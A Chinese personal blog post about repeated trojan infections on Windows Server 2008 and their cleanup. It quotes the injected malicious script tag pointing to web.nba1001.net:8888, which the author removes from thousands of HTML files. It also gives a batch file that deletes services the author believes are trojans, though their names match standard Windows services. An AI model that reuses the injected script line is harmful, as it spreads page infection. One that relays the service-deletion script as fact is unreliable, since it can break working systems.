一、遭遇木马
近日,偶在个人的NB上将Windows XP换成了Windows Server 2008。之前使用的卡巴在版本不支持Windows 2008。就打算换个Nod32(ESET Smart Security 4.0)试试。
Windows 2008确实比XP强悍,但后台运行的服务也比XP多。还没来得及细细品味Windows 2008所带来的喜悦与高性能,Win2008就中招了。
Nod32提示中毒,报警中木马了,硬盘指示狂闪。死机~,只得重启。汗~,木马驻入进程,还没来得及进入桌面,又自动重启了。这次完了,别把我硬盘数据又黑掉我了的吧?
重新启动电脑,F8进入安全模式,一看系统服务,果然多了几个陌生的服务:Ias、Irmon、Nla等。只好一个个手工清除掉。
C:/Windows/SYSTEM32/NWCWorkstation.dll
C:/Windows/SYSTEM32/Nla.dll
C:/Windows/SYSTEM32/Nwsapagent.dll
C:/Windows/System32/Ntmssvc.dll
……
用“Windows 清理助手”一查,发现好些个dll文件被感染了特洛伊木马:
(图1)
干掉!
真是郁闷。
二、再次“栽倒”
几天之后,又一次中招!而且是同样的马。
接连两次挂马,严重地干扰了偶的正常的IT生活和工作。对此,偶表示强烈的“谴责”和“抗议”。心想,应该是上次被感染的文件没有彻底清理掉,或者某个文件夹携带有病毒。
解决办法:
用NOD32 全面查杀一遍所有文件。
再用Windows 清理助手将系统扫一遍,发现中ReInstall.exe等几种病毒,清除!加上其他辅助工具:System Mechanic Pro5.5、优化大师WoptiUtilities,对系统进行清理和优化。然后,再装个木马清理王(AttMain.exe Ver5.00.3)把系统监控起来。
对比试用“Windows木马清道夫(防火墙)”,这玩意太占内存了(防护能力如何还不清楚)。
对系统“服务”进行清理。编个bat文件,删掉这些“服务”:
@echo off
echo 正在清理系统木马“服务”,请稍等......
sc delete FastUserSwitchingCompatibility
sc delete Ias
sc delete Irmon
sc delete Nla
sc delete FastUserSwitchingCompatibility
sc delete Ntmssvc
sc delete NWCWorkstation
sc delete Nwsapagent
echo 清理完成!
echo. & pause
三、想哭,哭不出来~
一周之后,系统再一次挂马!顶他大爷的肺~
我开始不相信“组织”了!难道NOD32对木马防护起的作用不大?木马清理王也不够强悍?
于是在网上搜啊,找啊,终于发现一款能有效对付木马的防毒软件AVG!它集合防病毒 + 防火墙,安全防护病毒、蠕虫、木马、黑客。
AVG反病毒软件9.0能实现安全、完美的防护,针对因特网上传播的新一代安全威胁,拥有有效的解决方案。
AVG反病毒软件9.0可确保您的数据安全,保护您的隐私,抵御间谍软件、广告软件、木马、拨号程序、键盘记录程序和蠕虫的威胁,对电子邮件及其附件进行实时监控,以防止计算机感染上病毒。在易于使用的界面之下,提供了高级的扫描和探测方式以及时下最尖端的技术。
下载,安装AVG Anti-Virus plus Firewall 9.0,赶紧用AVG扫扫,哇靠~ 一下子查出600多个程序(EXE)被感染了特洛伊木马。
(图2)
赶紧咔嚓了。
在打开本地某个网页文件时,Chrome浏览器提示该网页有web.nba1001.net:8888恶意代码,网页被修改了,在每个网页最后多了一行代码,链接地址为
<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js">
</script>
再次顶他大爷的~
Google一下,发现许多人反映(报告)也感染了nba 1001。但没指明具体的清除办法。这东西虽然不是很严重,但也影响偶看本地网页文件呀,保存下来的都是值得“珍藏”的好东西啊,而且这些好东西也要经常看看的。
那只好自己想办法了。
请出伴随偶多年的UltraEdit(以下简称UE),UE目前的最新版本为15.2。用它的全文检索功能逐一将这行脚本找出来并删除。
在资源管理器中选定目标,点击右键,选择“在文件中替换(在该目录)”,如图:
(图3)
在查找内容框中输入上述的脚本,替换为空就行了,文件类型输入:*.htm,然后勾选“搜索子目录”,按【全部替换】按钮,
(图4)
然后UE会弹出提示:“多文件替换可能会修改你磁盘中的多个文件……”,选择【是】,UE进行搜索,自动将这行脚本清除(替换)掉。
(图5)
在偶的机子上,光D盘就有5624个htm文件被挂马了。在搜索过程中,有时可能会出错,重来就是了。
其他盘或文件夹也用这方法,花点时间,基本上可以清除干净。
这几天下来,系统再没有发现有特洛伊木马了。AVG在防木马方面果然名不虚传,表现确实出色。系统也不需另外装防火墙了,AVG的Firewall 组件即可满足要求。
四、经验总结
网络有风险,“裸奔”需谨慎。在Windows系统“裸奔”是有风险的,并且应该打上必要的补丁。
检查任务管理器中是否有不熟悉的,或者来路不明的进程,如果有,干掉!
用Your Uninstaller 2010删除 /卸载不需要或不常用的软件程序,让系统保持相对“干净”。
(图6)
在CMD命令行中输入msconfig,查看,并去掉多余的启动项,当然也可用Your Uninstaller实用工具中的“启动管理器”来设置。
定期清除系统临时文件夹和/或系统垃圾:
C:/Windows/temp、C:/Users/XXXX/Local Settings/temp
清除IE临时文件与缓存:
C:/Users/XXXX/AppData/Local/Microsoft/Windows/Temporary Internet Files
或者用“一键清理系统垃圾文件”批处理也行。
用System Mechanic对系统垃圾清理;对C盘执行“磁盘清理”;
停掉/关闭不常用的服务,以提升系统性能。
最后,系统优化完成后,再次对系统盘Ghost一次。
几点建议:
形成良好的使用习惯,备份数据并GHOST系统,且需要把GHOST的GHO镜像扩展名改掉,需要还原的时候再修改过来。
养成良好的使用杀毒软件和防火墙习惯,即:每个弹出窗口都要仔细查看并快速的判断,切不可随意“确认”、“OK”。
为了计算机安全、尤其是账户安全,请定期使用本文的方法进行计算机病毒检查。
2143
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
